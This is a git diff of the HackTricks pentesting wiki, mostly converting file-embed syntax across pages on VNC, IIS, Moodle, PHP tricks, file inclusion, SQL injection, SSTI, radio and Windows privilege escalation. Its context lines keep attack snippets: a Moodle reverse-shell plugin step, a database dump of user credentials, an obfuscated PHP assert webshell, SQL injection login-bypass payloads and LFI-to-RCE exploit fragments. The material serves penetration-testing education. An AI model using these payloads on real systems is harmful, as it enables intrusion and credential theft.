@@ -280,6 +280,3 @@ Entry_7:
```
{{#include ../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/network-services-pentesting/pentesting-vnc.md b/src/network-services-pentesting/pentesting-vnc.md
index 8f67ed44c..1a40022e3 100644
--- a/src/network-services-pentesting/pentesting-vnc.md
+++ b/src/network-services-pentesting/pentesting-vnc.md
@@ -2,7 +2,6 @@
{{#include ../banners/hacktricks-training.md}}
-
## Basic Information
**Virtual Network Computing (VNC)** is a robust graphical desktop-sharing system that utilizes the **Remote Frame Buffer (RFB)** protocol to enable remote control and collaboration with another computer. With VNC, users can seamlessly interact with a remote computer by transmitting keyboard and mouse events bidirectionally. This allows for real-time access and facilitates efficient remote assistance or collaboration over a network.
@@ -44,14 +43,12 @@ You can do this because the password used inside 3des to encrypt the plain-text
For **Windows** you can also use this tool: [https://www.raymond.cc/blog/download/did/232/](https://www.raymond.cc/blog/download/did/232/)\
I save the tool here also for ease of access:
-{% file src="../images/vncpwd.zip" %}
+{{#file}}
+vncpwd.zip
+{{#endfile}}
## Shodan
- `port:5900 RFB`
-
{{#include ../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
index 97c65e8c5..2375e6f2a 100644
--- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
+++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
@@ -41,7 +41,9 @@ More information and techniques to exploit this vulnerability [here](https://sor
Download the list that I have created:
-{% file src="../../images/iisfinal.txt" %}
+{{#file}}
+iisfinal.txt
+{{#endfile}}
It was created merging the contents of the following lists:
@@ -274,6 +276,3 @@ HTTP/1.1 200 OK
```
{{#include ../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/network-services-pentesting/pentesting-web/moodle.md b/src/network-services-pentesting/pentesting-web/moodle.md
index 1f0b2c30b..def823c7d 100644
--- a/src/network-services-pentesting/pentesting-web/moodle.md
+++ b/src/network-services-pentesting/pentesting-web/moodle.md
@@ -2,7 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
## Automatic Scans
### droopescan
@@ -81,7 +80,9 @@ If you are manager you may still need to **activate this option**. You can see h
Then, you can **install the following plugin** that contains the classic pentest-monkey php r**ev shell** (_before uploading it you need to decompress it, change the IP and port of the revshell and crompress it again_)
-{% file src="../../images/moodle-rce-plugin.zip" %}
+{{#file}}
+moodle-rce-plugin.zip
+{{#endfile}}
Or you could use the plugin from [https://github.com/HoangKien1020/Moodle_RCE](https://github.com/HoangKien1020/Moodle_RCE) to get a regular PHP shell with the "cmd" parameter.
@@ -105,9 +106,4 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
/usr/local/bin/mysql -u --password= -e "use moodle; select email,username,password from mdl_user; exit"
```
-
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
index effb19737..3b5a74076 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
@@ -2,7 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
-
## Cookies common location:
This is also valid for phpMyAdmin cookies.
@@ -33,7 +32,9 @@ PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](htt
.png>)
-{% file src="../../../images/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf" %}
+{{#file}}
+EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf
+{{#endfile}}
- `"string" == 0 -> True` A string which doesn't start with a number is equals to a number
- `"0xAAAA" == "43690" -> True` Strings composed by numbers in dec or hex format can be compare to other numbers/strings with True as result if the numbers were the same (numbers in a string are interpreted as numbers)
@@ -504,8 +505,4 @@ $_=$$____;
$___($_[_]); // ASSERT($_POST[_]);
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md
index b52f848b7..601904aef 100644
--- a/src/pentesting-web/file-inclusion/README.md
+++ b/src/pentesting-web/file-inclusion/README.md
@@ -690,6 +690,8 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)\\
- [PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
-{% file src="../../images/EN-Local-File-Inclusion-1.pdf" %}
+{{#file}}
+EN-Local-File-Inclusion-1.pdf
+{{#endfile}}
{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
index 3b9ce92af..292132550 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
@@ -1,6 +1,5 @@
{{#include ../../banners/hacktricks-training.md}}
-
To exploit this vulnerability you need: **A LFI vulnerability, a page where phpinfo() is displayed, "file_uploads = on" and the server has to be able to write in the "/tmp" directory.**
[https://www.insomniasec.com/downloads/publications/phpinfolfi.py](https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
@@ -15,7 +14,9 @@ sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\>/g' phpinfolfi.py
You have to change also the **payload** at the beginning of the exploit (for a php-rev-shell for example), the **REQ1** (this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_), and **LFIREQ** (this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char)
-{% file src="../../images/LFI-With-PHPInfo-Assistance.pdf" %}
+{{#file}}
+LFI-With-PHPInfo-Assistance.pdf
+{{#endfile}}
### Theory
@@ -55,8 +56,4 @@ for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
print('[x] Something went wrong, please try again')
```
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md
index a85346847..ba6378cb0 100644
--- a/src/pentesting-web/ldap-injection.md
+++ b/src/pentesting-web/ldap-injection.md
@@ -16,7 +16,9 @@
**LDAP Injection** is an attack targeting web applications that construct LDAP statements from user input. It occurs when the application **fails to properly sanitize** input, allowing attackers to **manipulate LDAP statements** through a local proxy, potentially leading to unauthorized access or data manipulation.
-{% file src="../images/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
+{{#file}}
+EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
+{{#endfile}}
**Filter** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md
index 25a523188..3d75b4332 100644
--- a/src/pentesting-web/sql-injection/README.md
+++ b/src/pentesting-web/sql-injection/README.md
@@ -72,7 +72,9 @@ page.asp?id=1 and 1=2 -- results in false
This word-list was created to try to **confirm SQLinjections** in the proposed way:
-{% file src="../../images/sqli-logic.txt" %}
+{{#file}}
+sqli-logic.txt
+{{#endfile}}
### Confirming with Timing
@@ -315,7 +317,9 @@ admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
You should use as username each line of the list and as password always: _**Pass1234.**_\
NAN;_(This payloads are also included in the big list mentioned at the beginning of this section)_
-{% file src="../../images/sqli-hashbypass.txt" %}
+{{#file}}
+sqli-hashbypass.txt
+{{#endfile}}
### GBK Authentication Bypass
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
index 451278260..a661c75e2 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
@@ -182,7 +182,9 @@ pgsql_exec(PG_FUNCTION_ARGS)
You can find the DLL compiled in this zip:
-{% file src="../../../images/pgsql_exec.zip" %}
+{{#file}}
+pgsql_exec.zip
+{{#endfile}}
You can indicate to this DLL **which binary to execute** and the number of time to execute it, in this example it will execute `calc.exe` 2 times:
diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md
index 9dc05dac3..648ca7da6 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/README.md
@@ -1076,7 +1076,9 @@ Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/mast
## BlackHat PDF
-{% file src="../../images/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15 (1).pdf" %}
+{{#file}}
+EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15 (1).pdf
+{{#endfile}}
## Related Help
diff --git a/src/todo/hardware-hacking/radio.md b/src/todo/hardware-hacking/radio.md
index 2e7666bc7..d6df4f802 100644
--- a/src/todo/hardware-hacking/radio.md
+++ b/src/todo/hardware-hacking/radio.md
@@ -64,7 +64,9 @@ If you are checking a signal there are different ways to try to figure out what
## AM Example
-{% file src="../../images/sigdigger_20220308_165547Z_2560000_433500000_float32_iq.raw" %}
+{{#file}}
+sigdigger_20220308_165547Z_2560000_433500000_float32_iq.raw
+{{#endfile}}
### Uncovering AM
@@ -141,7 +143,9 @@ Also, use **codifications** such as **Manchester**, and **up+down** can be **1 o
## FM Example
-{% file src="../../images/sigdigger_20220308_170858Z_2560000_433500000_float32_iq.raw" %}
+{{#file}}
+sigdigger_20220308_170858Z_2560000_433500000_float32_iq.raw
+{{#endfile}}
### Uncovering FM
@@ -196,6 +200,3 @@ You can use the **same technique as the one used in the AM example** to get the
You can use the **same technique as the one used in the AM example** to get the bits once you have **found the signal is modulated in frequency** and the **symbol rate**.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md
index ca08aced2..b663aa7b6 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/README.md
@@ -195,7 +195,9 @@ In orther to exploit this vulnerabilities you can use tools like: [Wsuxploit](ht
Read the research here:
-{% file src="../../images/CTX_WSUSpect_White_Paper (1).pdf" %}
+{{#file}}
+CTX_WSUSpect_White_Paper (1).pdf
+{{#endfile}}
**WSUS CVE-2020-1013**